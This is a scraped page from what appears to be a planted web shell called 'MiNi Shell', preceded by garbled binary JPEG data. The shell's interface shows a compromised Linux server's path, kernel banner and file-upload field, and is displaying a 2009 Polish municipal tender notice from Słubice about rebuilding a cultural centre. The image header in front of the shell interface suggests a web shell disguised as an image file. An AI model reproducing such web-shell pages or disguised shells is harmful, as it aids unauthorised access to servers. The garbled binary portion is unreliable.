JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090601/174082-N-2009.html

<p class="kh_header"><b>Słubice: Przetarg nieograniczony pod nazwą: Lubuskie Centrum Tożsamości Regionalnej Pro vincja - przebudowa pomieszczeń części budynku Słubickiego Miejskiego Ośrodka Kultury w Słubicach w ramach Lubuskiego Regionalnego Programu Operacyjnego na lata 2007-2013, działanie 5.1</b><br>
<b>Numer ogłoszenia: 174082 - 2009; data zamieszczenia: 01.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Słubice , ul. Akademicka 1, 69-100 Słubice, woj. lubuskie, tel. 095 7372000, faks 095 7582880.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.slubice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony pod nazwą: Lubuskie Centrum Tożsamości Regionalnej Pro vincja - przebudowa pomieszczeń części budynku Słubickiego Miejskiego Ośrodka Kultury w Słubicach w ramach Lubuskiego Regionalnego Programu Operacyjnego na lata 2007-2013, działanie 5.1.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa pomieszczeń części budynku zlokalizowanego przy ul. 1-go Maja w Słubicach w celu zmiany układu funkcjonalnego części pomieszczeń oraz poprawy układu komunikacyjnego poprzez modernizację wewnętrznej klatki schodowej oraz montażu wewnętrznej windy osobowo-towarowej z przystosowaniem dla osób niepełnosprawnych.
Zakres robót :
-roboty  rozbiórkowe na poszczególnych kondygnacjach budynku
-roboty ogólnobudowlane 
-roboty wykończeniowe
-stolarka drzwiowa i okienna
-roboty dekarskie (dach)
-roboty instalacyjne w zakresie instal wod-kan.,elektrycznej podstawowej,oświetlenia awaryjnego i ewakuacyjnego, instalacja komputerowa
-roboty w zakresie systemu instalacji klimatyzacyjnej 
-montaż dźwigu towarowo-osobowego
Łączna powierzchnia modernizacji obiektu wynosi 1743 m2
i obejmuje :
a)  roboty w części piwnicznej związane z modernizacją układu komunikacyjnego budynku - schody oraz szyb windy osobowo-towarowej,
b)przebudowę I piętra w tym pomieszczenia salonu literackiego, sale wielofunkcyjną z zapleczem oraz małą galerię i częściowo pomieszczenia administracyjne.
c) przebudowa II piętra obejmuje pomieszczenia wystawowe, pracownie fotograficzne, pracownie plastyczne oraz pomieszczenia studyjne (sala prób, studio nagrań i reżyserka)
d)  roboty dachowe -rozbiórki i wykonanie nowych obróbek blacharskich, tynkowanie kominów, naprawa i uzupełnienie pokryci dachowego z papy termozgrzewalnej, rynny i rury spustowe
e)przebudowa obejmuje również instalacje wodociągową, wewn. kanalizację sanitarną, instalacje klimatyzacyjną w określonych pomieszczeniach oraz instalację elektryczną
 w tym instalacje elektryczne podstawowe, oświetlenie awaryjne i ewakuacyjne, wykonanie instalacji komputerowej typu LSA
f) montaż i dostawa wyposażenia, m.in. meble, oświetlenie, sprzęt komputerowy, sprzęt fotograficzny.
Szczegółowy opis przedmiotu zamówienia jest opisany w dokumentacji projektowej, specyfikacjach technicznych wykonania i odbioru robót oraz kosztorysach ofertowych (przedmiarach). Wymienione dokumenty są załącznikami do niniejszej SIWZ (załącznik nr 3). 
	Uwaga: Zamawiający dopuszcza zastosowanie materiałów i urządzeń równoważnych do materiałów i urządzeń określonych w dokumentacji projektowej, pod warunkiem, że zaproponowane rozwiązania są pod względem technicznym, jakościowym i funkcjonalnym takie same bądź lepsze od opisywanych w dokumentacji projektowej.
Wraz z ofertą należy złożyć kosztorys ofertowy sporządzony na podstawie załączonych przedmiarów robót. Kosztorys będzie miał charakter informacyjny. 
Wykonawca wraz z ofertą przedstawi harmonogram rzeczowo - finansowy realizacji zadania z terminem zakończenia prac na 30 czerwca 2010 r. W roku 2009 r. Wykonawca winien przewidzieć wykonanie robót do kwoty 2 500 000 PLN brutto. 
Wykonawca udzieli 36 miesięcy gwarancji na wykonane roboty i dostarczone materiały.
Wykonawca zapewni własnym staraniem i na własny koszt wykonanie i montaż zarówno tablic informacyjnych jak i pamiątkowych. Tablica informacyjna powinna zostać umieszczona w terminie nie dłuższym niż 30 dni od dnia zawarcia umowy. Tablica pamiątkowa winna być umieszczona po zakończeniu inwestycji do dnia podpisania protokołu odbioru prac. Szczegółowe informacje dotyczące tablic można uzyskać na stronie internetowej www.lrpo.lubuskie.pl..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.11.13.00-1, 45.40.00.00-1, 45.31.31.00-5, 39.29.00.00-1, 38.65.00.00-6, 32.34.24.20-6, 32.41.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości  40 000 zł.
2.Wykonawca może wnieść wadium w jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy, tj.:
1)pieniądzu,
2)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)gwarancjach bankowych,
4)gwarancjach ubezpieczeniowych,
5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr z 2007 Nr 42, poz. 275).
3.Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4.Wadium w pieniądzu należy wnieść przelewem  na konto Zamawiającego:
Bank PKO BP S.A. Nr 27 1020 2036 0000 0602 0044 0966  
W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
5.W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego w Sekretariacie Burmistrza w  pok. Nr 118 lub dołączyć do oferty.
Nie złożenie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 4 ustawy, a jego oferta zostanie odrzucona zgodnie z art. 24 ust. 4 ustawy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
1.	posiadają uprawnienia do wykonania określonej działalności lub czynności jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (na podstawie art. 24 ustawy PZP).
Ocena spełnienia warunków dokonywana będzie na podstawie złożonych dokumentów i oświadczeń wymienionych w rozdziale VI, na podstawie kryterium spełnia / nie spełnia. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż wyżej wymienione warunki Wykonawca spełnił.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Oświadczenia, które należy złożyć do oferty:
a)Oświadczenie Nr 1 (zgodnie z art.22 Pzp) - posiadamy uprawnienia do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
b)Oświadczenie Nr 2 (zgodnie z art.22 Pzp) - posiadamy niezbędną wiedzę i doświadczenie oraz dysponujemy potencjałem technicznym i osobami zdolnymi do wykonania zamówienia. W przypadku Wykonawców dysponujących potencjałem technicznym lub osobami udostępnionymi przez inne podmioty, należy przedstawić pisemne zobowiązanie tych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania przedmiotowego zamówienia.
c)Oświadczenie Nr 3 (zgodnie z art.22 Pzp)   znajdujemy się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
d)Oświadczenie Nr 4 (zgodnie z art.22 Pzp) - nie podlegamy wykluczeniu z postępowania o udzielenie zamówienia.
2.Wraz z ofertą należy złożyć dokumenty:
a) Dokument Nr 1 - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
b)Dokument Nr 2 - aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia.
c) Dokument Nr 3 - stwierdzający, że osoby które będą wykonywać zamówienie posiadają wymagane zezwolenia, jeżeli ustawy nakładają posiadanie takich zezwoleń. 
Zamawiający wymaga złożenia dokumentów potwierdzających posiadanie od kierowników budowy uprawnień budowlanych w specjalnościach:
-konstrukcyjno-budowlanej,
-instalacyjnej w zakresie sieci instalacji wodociągowych i kanalizacyjnych,
-instalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych.
Wraz z uprawnieniami należy dostarczyć aktualne dokumenty stwierdzające przynależność do Izby Inżynierów Budownictwa.
d) Dokument nr 4 - wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie.
Zamawiający wymaga wykazania wykonania co najmniej jednej roboty budowlanej dotyczącej budowy lub remontu kubaturowego obiektu budowlanego użyteczności publicznej o pow. min 1 000m2 i wartości brutto 1 500 000 PLN.
e) Dokument nr 5 - informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. Zamawiający wymaga posiadania środków finansowych bądź zdolności kredytowej w wysokości min 2 000 000 PLN.
f) Dokument nr 6 - polisa, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności w wysokości min 1 000 000 PLN..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.slubice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski, ul Akademicka 1, 69-100 Słubice, pok 216.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.06.2009 godzina 11:00, miejsce: Urząd Miejski, ul Akademicka 1, 69-100 Słubice, Sekretariat Burmistrza, pok 118.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com